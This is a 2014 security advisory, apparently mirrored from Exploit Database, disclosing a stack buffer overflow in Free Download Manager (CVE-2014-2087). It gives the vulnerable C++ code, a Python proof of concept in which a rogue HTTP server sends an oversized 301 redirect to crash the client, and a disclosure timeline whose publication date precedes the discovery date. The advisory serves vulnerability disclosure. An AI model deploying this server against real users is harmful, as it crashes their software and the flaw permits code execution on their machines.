Free Download Manager – Stack Buffer Overflow

• Exploit Database
• 9 阅读

• 作者： Julien Ahrens
  日期： 2014-03-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32332/

• RCE Security Advisory
  http://www.rcesecurity.com
   
   
  1. ADVISORY INFORMATION
  -----------------------
  Product:Free Download Manager
  Vendor URL: www.freedownloadmanager.org
  Type: Stack-based Buffer Overflow [CWE-121]
  Date found: 2014-02-20
  Date published: 2014-02-13
  CVSSv2 Score: 9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
  CVE:CVE-2014-2087
   
   
  2. CREDITS
  ----------
  This vulnerability was discovered and researched by Julien Ahrens from
  RCE Security.
   
   
  3. VERSIONS AFFECTED
  --------------------
  Free Download Manager v3.9.3 build 1360 (latest)
  Free Download Manager v3.8 build 1173
  Free Download Manager v3.0 build 852
  and other older versions may be affected too.
   
   
  4. VULNERABILITY DESCRIPTION
  ----------------------------
  A stack-based buffer overflow vulnerability has been identified in the
  Free Download Manager.
   
  The application parses download requests, which are added to the
  download queue, but does not properly validate the length of the
  complete download queue object when it’s removed from the queue by the
  user. The following function from fdm.exe (source file:
  Downloads_Deleted.cpp) is triggered on deletion:
   
  void CDownloads_Deleted::UpdateDownload(int iItem)
   
  This function reads the filename of the download object using
  CDownloads_Tasks::GetFileName into szFile and adds the whole URL value
  as a description (in brackets) via an insecure strcat() sequence to
  szFile during the queue deletion process.
  
  Since the application follows HTTP 301 redirects, an attacker who
  controls the target HTTP server is able to send arbitrary long filename
  values to exploit this flaw. If the complete name of the queued download
  exceeds the size of szFile (10000 bytes), strcat() writes outside the
  expected memory boundaries. 
   
  This leads to a stack-based buffer overflow with an overwritten SEH
  chain or return points, resulting in remote code execution. Successful
  exploits can allow remote attackers to execute arbitrary code with the
  privileges of the user running the application. Failed exploits will
  result in a denial-of-service condition.
   
  This vulnerability is also exploitable locally via "File->Import->Import
  list of downloads"
   
   
  5. VULNERABLE CODE PART
  -----------------------
  // Downloads_Deleted.cpp
   
  void CDownloads_Deleted::UpdateDownload(int iItem)
  {
  vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
   
  CHAR szFile [10000]; 
  CDownloads_Tasks::GetFileName (dld, szFile);
  lstrcat (szFile, " (");
  lstrcat (szFile, dld->pMgr->get_URL ());
  lstrcat (szFile, ")");
  SetItemText (iItem, 0, szFile);
  [..]
  }
  
  
  6. PROOF-OF-CONCEPT (PYTHON)
  ----------------------------
  #!/usr/bin/python
  from socket import *
  from time import sleep
   
  host = "192.168.0.1"
  port = 80
   
  s = socket(AF_INET, SOCK_STREAM)
  s.bind((host, port))
  s.listen(1)
  print "\n[+] Listening on %d ..." % port
   
  cl, addr = s.accept()
  print "[+] Connection accepted from %s" % addr[0]
   
  junk0 = "\x43" * 9000
   
  payload = junk0
   
  buffer = "HTTP/1.1 301 Moved Permanently\r\n"
  buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
  buffer += "Server: Apache/2.2.22 (Debian)\r\n"
  buffer += "Location: "+ payload + "\r\n"
  buffer += "Vary: Accept-Encoding\r\n"
  buffer += "Content-Length: 8000\r\n"
  buffer += "Keep-Alive: timeout=5, max=100\r\n"
  buffer += "Connection: Keep-Alive\r\n"
  buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
  buffer += "\r\n"
  buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
  buffer += "<html><head>\n"
  buffer += "<title>301 Moved Permanently</title>\n"
  buffer += "</head><body>\n"
  buffer += "<h1>Moved Permanently</h1>\n"
  buffer += "<p>The document has moved <a
  href=\""+payload+"\">here</a>.</p>\n"
  buffer += "</body></html>\n"
   
  print cl.recv(1000)
  cl.send(buffer)
  print "[+] Sending buffer: OK\n"
   
  sleep(1)
  cl.close()
  s.close()
   
   
  7. SOLUTION
  -----------
  None
   
   
  8. REPORT TIMELINE
  ------------------
  2014-02-20: Discovery of the vulnerability
  2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
  2014-02-24: MITRE assigns CVE-2014-2087
  2014-02-25: Vendor Notification #2
  2014-02-26: Vendor Notification #3
  2014-03-05: Vendor Response
  2014-03-05: Vulnerability details sent to vendor
  2014-03-09: RCE Security asks for a status update
  2014-03-13: No response from vendor
  2014-03-13: Full Disclosure according to disclosure policy
   
   
  9. REFERENCES
  -------------
  http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution